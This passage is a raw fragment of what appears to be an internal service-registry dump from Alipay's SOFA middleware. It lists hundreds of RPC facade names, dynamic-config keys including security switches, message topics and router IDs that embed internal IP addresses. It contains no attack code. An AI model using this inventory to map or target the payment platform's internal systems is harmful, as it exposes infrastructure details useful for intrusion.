THY_V2@socplt#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","Alipay.cifin:name=com.alipay.zcache.tbase.bankcardTairCache_dest.localCacheSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finance.filefactory.sevice.FilePlatformParseReceiver:1.0:unitradeprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finfocore:name=com.alipay.darwin.release.releaseJson,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.bizfundprod.common.service.facade.refund.OrderRefundFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.166.159.217#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.staff.common.service.facade.PartnerSumService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.189.11#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.jointcardprod.service.facade.JointCardQueryServiceFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mitemcenter.common.service.facade.api.ItemManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.aip.config.AIPProtocolManageDRMResource.includeFailedCntStatusCode,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.insttrade:name=midas.client.MidasClientStabilityDRMControl.chance,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mservice.common.service.facade.api.gateway.GatewayFacade:1.0:openmonitor_ats_riskStrategyFrontService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilecodec.service.facade.MerchantTokenFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finbaservice.common.service.facade.partner.api.PartnerMasterIdFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mdistinguish.common.service.facade.distinguishprod.ResIdentifyPkgFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.pcardsales:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.successParkIntervalMs,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.pointprod.common.service.pointlibrary.api.PointLibraryReceiptService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.otp.common.service.facade.api.OtpQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openinsight.common.service.facade.rec.api.RecSolutionServiceFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.icif.service.facade.api.MerchantOperatorService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promocommopt.com.service.facade.api.SelfMarketingPromoCampManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.19.30.31#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.insassetprod.common.service.facade.LocationSearchFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfocore.common.service.facade.cds.mng.PositionFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbsettle.service.facade.common.api.SettleFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.paycheckerCZTBaseCache.watchMember,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:zparamcore_parmMntListWorkflowUpdateCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:scardcenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fincommontaskhub.service.facade.service.spi.FinalizeService:1.0:fintradecenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.aciamcore.common.service.facade.app.AppRoleServiceFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.pcreditmarket.service.PcreditMarketPromoFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.aip.config.AIPProtocolManageDRMResource.notifyRiskEvaluate,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.yebplus.common.facade.service.api.baobei.api.query.BBTaskQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_FPCMC#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openhome.facade.admin.AppAdminFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_PAYMENTMNG#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.pcreditmarket.service.PcreditMarketPromoTriggerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.csshield.service.facade.api.DatasetServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileha.core.service.antha.AnthaTinyappPvDomainService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.charge:name=com.alipay.zcache.tbase.chargeGzoneTBaseCache.localCacheSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.gffxtrade.common.service.facade.api.FxTradeOrderManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.lifeprod.common.service.facade.api.chat.CustomerServiceInfoQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditschedule.service.facade.spi.ExecuteService:1.0:settle_pay_timeout_service@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.yebdistributor.common.facade.service.FundTradeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileic.common.adapter.prod.ca.UkeyDetailStorage:1.0:externUkeyDetailStorage@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.22.141#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.revol.core.service.facade.ScriptChecker:1.0:appfuse@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.mwalletmng:name=com.alipay.mwalletmng.biz.luckymoney.drm.LuckMoneyDRMResource.global,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.appxcore.common.service.facade.api.permission.RoleDataConfigMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:kbitemprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilecodec.component.service.inner.ComponentInnerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.166.53.189#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.zcbprod.common.service.facade.activity.service.PrizeActivityQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.routeclient.interfacename:minialipayweb-sff-antvip-test-one#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.kbasset.common.service.facade.stuff.api.StuffCheckFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.dt.onedata.dwm.client.record.SubmittedObjectOpenService:1.0:dpblackbox@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.minitrans.service.facade.alipaypoint.api.AlipayPttransQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mservice.common.service.facade.api.workflow.WorkflowSubjectLabelFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fininfo.common.service.facade.info.InfoSystemInvokeService:1.0:unitradeprod@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.assetflux.service.api.RefundService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cfmng:name=com.alipay.common.security.util.dresource.SecurityCommonUtilDrm.defaultEncodeTestRunSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mfinquotationprod.common.service.facade.api.QuoteQueryFacade:1.0:gold@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:pledgecore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mnotify.biz.client.client.rpc.MNotifyPluginRPCService:1.0:voucherprod@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfocore.biz.infocenter.FinfoCenterYCTransFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dpc.dasbi.common.service.facade.api.DatasetFieldFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openhome.facade.signorder.SignOrderQueryServiceFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.33.239#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fc.fluxconf.service.facade.ctrl.DataStructConfigService:1.0:fluxconf@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zdataquery.common.service.facade.hbase.FinTntComposeExchangeWithdrawHbaseQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zqueue.server.finbatchInfoFluxQueue#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.kbomp.common.service.facade.manager.api.ModuleConfExtFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.voucherfront.common.service.facade.api.voucher.VoucherQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.publiccore.common.service.facade.channel.PublicInfoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lendpofprod:name=com.alipay.lendpofprod.core.shared.drm.FlowConfigDrm.forkJoinBudgetArSizeThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sofa.rpc.elastic.ElasticService:1.0:trafficcardsp@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.prodquery.common.service.facade.standard.api.task.BatchTaskQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:antfeaturecloud@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.promocenter:name=com.alipay.promocenter.common.drm.MerchantOperatorResource.biscenterNewType,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:checkDeleteFeedbackPreCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.filebridge.service.facade.workbench.FileBridgeOperateRecordService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bbcmng.immunemng.facade.ImmAllSolutionFacade:1.0:finreconchecker@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.core.orderexec.core.drm.CoreOrderExecuteDRMResource.redemptionFeeReminderText,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.peerpayprod.senior.common.service.facade.point.api.PointCertQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bkbcs.common.service.facade.clearing.api.BcsPayOrderService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bkloandecision.service.facade.agds.GeneralApprovalConclusionOperateService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promomng.core.service.gotong.GotoneQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_192.168.1.108#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_30.55.210.211#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","NS_Pub_Servers_TP_RQ_Notify_2#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.clearingcenter:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.faultInRouteValue,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.hyp.common.service.facade.EventTaskResFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.swiftweb.facade.OperationQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.tradeexprod:name=com.alipay.antvip.client.internal.drm.DrmControl.waitServerListTimeoutMs,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mychain.gov.common.facade.api.NotifyService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofademo.service.TransferService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.null:name=com.antcloud.ifcidentitycloudus.biz.nac.drm.NacConfigDrmServiceImpl.appVersionConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sofa.platform.schedule.concurrent.execute.Executer:1.0:sourceRateSubScribeTaskExecuter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.pcald.common.service.facade.IndicatorQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.appstore.common.service.facade.commodity.BumngKmiEncryptFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.customerTairCache.compressionThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobileappcommon.common.service.facade.baas.AppPlatformConfigMngFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dcepcoin.core.service.secumachine.report.SecuMachineLogService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","asop@msgbrokerMosn#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_192.168.0.20#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.kbsearch.common.service.facade.api.buffettConfig.BuffettConfigManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.ptcore.common.service.facade.api.presstest.PressTestDataRecordConfigFacade:1.0:PDCORE_ANTGW2CN@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.loancore.common.service.facade.alipay.api.ZlcPeriodService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.yuyan.controlgw.request:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_F_PCTDATA_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","SOFA_PRC_TRANSMIT_ERECON#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.128.69#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.prodmng:name=com.alipay.common.security.dresource.SecurityCommonDrm.uriCheckDeny,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","rcreportcenter@msgbrokerMosn#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.necbill.common.service.loan.IntFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.baoxianprod.zhx.facade.ZHXInsurePaymentFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cfmng:name=com.alipay.common.security.dresource.SecurityCommonDrm.refererCheckerEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.voucherprod.facade.api.fund.VcpFundManagerFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.antgroup.zmxy.zmservicehub.common.service.facade.masterdata.BankCardQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:mobilemock@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchservbase.biz.service.task.facade.TaskQueryServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openbizmock.service.facade.template.TemplateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:unitradeadapter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_EC_fundFixedInvestmentSign#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_30.50.114.100#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","SOFA_PRC_TRANSMIT_IEXCHANGE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:fincommonbff@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.framework.core.facade.OpscloudClientServiceFacade:1.0:DataWorks@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.riskmng.common.service.facade.api.RiskTaskDecisionCallBack:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openinsight.common.service.facade.rec.api.RecDistrictQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.mif.common.service.facade.MerchantCertificateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insopenprod.common.service.facade.api.AccessControlServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.instservice.common.service.facade.plugin.IscModuleMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.routeclient.interfacename:pcmngsff#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","SOFA_PRC_TRANSMIT_RULESCANER#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.Arch:name=com.alipay.xts.GlobalSwitcher.elasticRuleForPayment,version=1.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.charge:name=com.alipay.cif.client.drm.CreditAgreementClientSwitch.normalSwitchToRpc,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","NS_Pub_Servers_TP_O_PRODMNG#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.zpublishuiweb:name=com.alipay.zpublish.biz.shared.utils.NodeParameters.maxConcurrentTasks,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finpromoprod.common.service.facade.kernel.CommonCampConsultFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_192.168.201.21#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.minitrans.service.facade.baopoint.api.BpdtransQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.security.sandbox.runtime.facade.service.SecuritySandboxExperimentDataFacade:1.0:unique-1000011@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:antreplay@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finpwm.facade.service.ActionQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.bp.engine.service.BPQueryService:1.0:mrchiscore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_S_DEPOSITBACK_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.zprodqueryTairCacheCZone_dest.compressionType,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.antfeaturelib.common.facade.service.DataViewProtocolQueryService:1.0:PromoRecommend_recneptune@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.anteduprod.common.service.facade.api.train.QueryValidGroupInnerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.23.224.74#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.afwrobottwa:name=com.alipay.routeclient.DefaultRouteCoordinator.status,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.peerpayprod.common.service.facade.FamilyUserQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secucns.common.service.facade.WeixinApiFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_XY_TEST0724#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.routeclient.interfacename:mobileappcommon#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.fc.atcenter.service.facade.api.TallyRuleConsultService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:dtbank@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.multimediabase.facade.core.ARtcCrcCtrlFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_C_OPEN_DEVELOPER#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.anteduprod.common.service.facade.api.certify.CampusBizConfigBackyardFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mfinbaseprod.common.service.facade.api.Search30FatConfigMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditprerec.service.bizcov.GrayBizCovMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gffund.common.service.facade.api.ExceptionVoucherOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.yebcore.common.facade.subcard.SubCardCancelService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ismonitor.core.service.censor.sendmsg.CensorSendDingClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.120.91#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.channelrouter.management.facade.ChannelManagementService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilesearch.biz.rpc.service.MrpcExecuteFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.infosec.common.service.facade.FastTextAnalyzeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.iotcube.common.service.facade.openapi.clientswitch.ClientSwitchQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acoffercenter.common.service.facade.price.InquiryPriceServiceFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.ALIPAYZAUTHJSESSIONID.legacyRwWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.zcbsalescenter.common.service.integration.prodtrans.ProdtransQueryExtPropFacadeClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finasmcore.common.service.facade.pcx.service.EquityInterventionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kmi.common.service.facade.SceneMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.aciamweb.common.service.facade.common.CommonServiceFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.fininfo:name=com.alipay.finsupport.component.cache.ctrldata.drm.NuccWhiteListDRM.nuccChannelSystemIds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:promomng_antWorkOrderCommonProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.certifymng:name=com.alipay.antvip.client.internal.drm.DrmControl.mainSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_100.69.213.216#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_11.124.138.114#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.antsycm.common.service.facade.mng.MngIndentityFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.fraudmng:name=com.alipay.zoneclient.internal.DynamicLdcSwitchResource.ldcTimeDelayed,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.158.88.26#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.identitydecision.common.service.facade.decision.DecisionPathQueryFacade:1.0:identitydecision@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paymentmng.service.facade.limit.GroupRulesManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mservicesinspect.biz.inspect.detecttask.DetectTaskOrderComponent:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fincommontaskhub.service.facade.service.spi.FinalizeService:1.0:vehownerprod-ccb-central-zk@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbservcore.common.service.facade.kbjob.KbJobUserAdminFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.unitradeprod.common.facade.service.OrderQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.lifemng.facade.pucprod.EbppSystemParamServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_C_KABAO#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.secucommunity.activity.api.SevenActivityFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.171.230#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","config:com.alipay.bpaas.ecomerchant.facade.apply.ApplyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:zmepcertifybff@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.socialportal.web.signup.rpc.facade.SignupFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_INSASSETPROD#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finassettrade.fintradespi.spi.FinTradeCloseSpi:1.0:finfundtrade-close-spi@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_S_1217#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.opinioncore:name=com.alipay.common.tracer.manage.TracerDrm.zdalDbDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sofa.platform.schedule.concurrent.execute.Executer:1.0:EC_IRECON2_REVERSE_GUARD_TASK@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zpaas:name=com.alipay.common.security.dresource.SecurityCommonDrm.htmRefererCheckerEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mpromocenter.common.service.facade.industry.api.IndustryQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.platform.schedule.concurrent.execute.Executer:1.0:apprOrderRecoveryExecuter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.icfmng.common.service.facade.api.VoucherBindFundAccService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.test.SimpleService-45#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.secucommunity.common.service.facade.contentsync.ContentSyncTriggerServiceFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mitemcenter.common.service.facade.api.ItemBatchManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.prodquery.common.service.facade.standard.api.product.ClientCacheServiceFacade:1.0:ANTGW2CN@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.fraudmng:name=com.alip